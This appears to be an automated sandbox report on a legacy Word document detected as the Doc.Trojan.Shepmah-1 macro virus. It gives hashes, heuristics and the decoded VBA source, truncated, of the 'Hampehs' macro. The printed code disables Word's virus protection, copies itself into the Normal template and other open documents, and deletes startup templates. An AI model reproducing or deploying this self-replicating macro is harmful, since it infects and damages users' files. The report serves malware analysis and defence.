Office (OLE) malware analysis — malicious · 491d8a45e79b1149

MALICIOUS

Office (OLE)

77.5 KB Created: 2002-07-16 08:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 009a1a136df85e26eade2f520e44d967 SHA-1: 09ac7161d4e03dab53514e9227113d4bfefeba0e SHA-256: 491d8a45e79b11490a12be121cab5c7bfd1ded4049b9f84346e34dd5881ed251

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a legacy Word document containing VBA macros, including an AutoOpen macro, which is a common technique for malicious documents. The script attempts to copy itself to the Normal template and other documents, indicating a persistence or spreading mechanism. The ClamAV detection further supports its malicious nature. The embedded URL 'hampehs.cjb.net' is noted but flagged as benign.

Heuristics 5

ClamAV: Doc.Trojan.Shepmah-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Shepmah-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://hampehs.cjb.net In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14530 bytes
SHA-256: `148a0071417ebcf184c97e866b0dafb32c9cbdabb1f9d5cf8bb08149560e44f3`
Detection ClamAV: Doc.Trojan.Shepmah-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "hampehs" 'Hampesh v1.0b 'Release : 12/10/1999 'Dedicated to the biggest PUKIMAK in Malaysia! 'Dato' Seri Dr Mahathir Mohamed Public Ushar_SB As Variant Public Dah_Jumpe, Check As Boolean Public actDoc, SloSlo As Object Function Go_DingDang() Dim coprasmi As String On Error Resume Next coprasmi = "hampehs" With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With ToolsOptionsSave.GlobalDotPrompt = 0 For chett = 1 To 2 If NormalTemplate.VBProject.VBComponents.Item(coprasmi).Name <> coprasmi Then ddSrc = ActiveDocument.FullName ddDest = NormalTemplate.FullName Check = True Ushar_SB = NormalTemplate.VBProject.VBComponents.Item(2).Name Bunuh_SB ddDest Makan_Budak ddSrc, ddDest, coprasmi End If If Dah_Jumpe = True Then Check = False ddDest = actDoc.FullName usharAct = actDoc Set SloSlo = actDoc ddSrc = NormalTemplate.FullName Else If ActiveDocument.VBProject.VBComponents.Item(coprasmi).Name <> coprasmi Then Check = False ddSrc = NormalTemplate.FullName ddDest = ActiveDocument.FullName usharAct = ddDest Set SloSlo = ActiveDocument Else: akuLerWoi = True End If End If If akuLerWoi = True Then GoTo pusin Ushar_SB = actDoc.VBProject.VBComponents.Item(2).Name Ushar_Awek = actDoc.VBProject.VBComponents.Item(3).Name If Ushar_SB = "hampehs" And Ushar_Awek = "DingDang" Then GoTo pusin Bunuh_SB ddDest Makan_Budak ddSrc, ddDest, coprasmi orait = True pusin: coprasmi = "DingDang" Next chett With Dialogs(wdDialogFileSummaryInfo) .Author = "DingDang Yang Kiyut" .Title = "Hampehs! What The Hell Is It?" .Subject = "It is other method saying SHIT!" .Comments = "This is only a beginning... wait for the worst to come after Hampehs. It will be much more worst! Visit Hampehs at http://hampehs.cjb.net for disinfection!" .Keywords = "I Love Shida!!" .Execute End With If orait = True Then SloSlo.SaveAs FileName:=SloSlo.FullName End Function Sub Bunuh_SB(Fail_SB) If Ushar_SB = "hampehs" Or Ushar_SB = "" Then GoTo tadak_sb Application.OrganizerDelete Fail_SB, Ushar_SB, wdOrganizerObjectProjectItems tadak_sb: End Sub Sub Makan_Budak(Sos, Tuju, Stem) On Error Resume Next Set aplikasi = Application aplikasi.OrganizerCopy Sos, Tuju, Stem, 3 If Check = False Then Set Desc = ActiveDocument Else Set Desc = NormalTemplate Desc.VBProject.Description = "Hampehs [DD/UTM'99]" End Sub Sub AutoExec() With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With End Sub Sub AutoOpen() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Kill Application.StartupPath & "\*.dot" Set actDoc = ActiveDocument Go_DingDang If Documents.Count > 1 Then Dim bil For bil = 1 To Documents.Count If Documents(bil).Name <> ActiveDocument.Name Then Set actDoc = Documents(bil) Dah_Jumpe = True Go_DingDang End If Next End If End Sub Sub FileOpen() WordBasic.disableautomacros True If Dialogs(80).Show <> 0 Then WordBasic.disableautomacros False AutoOpen WordBasic.disableautomacros False End Sub Sub ViewVBCode() On Error Resume Next End Sub Attribute VB_Name = "DingDang" Attribute VB_Base = "0{29ADC29E-2509-4B36-BF84-61834BB94656}{7BAE74D0-4587-43EC-9E02-8323DA108FDB}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False At ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.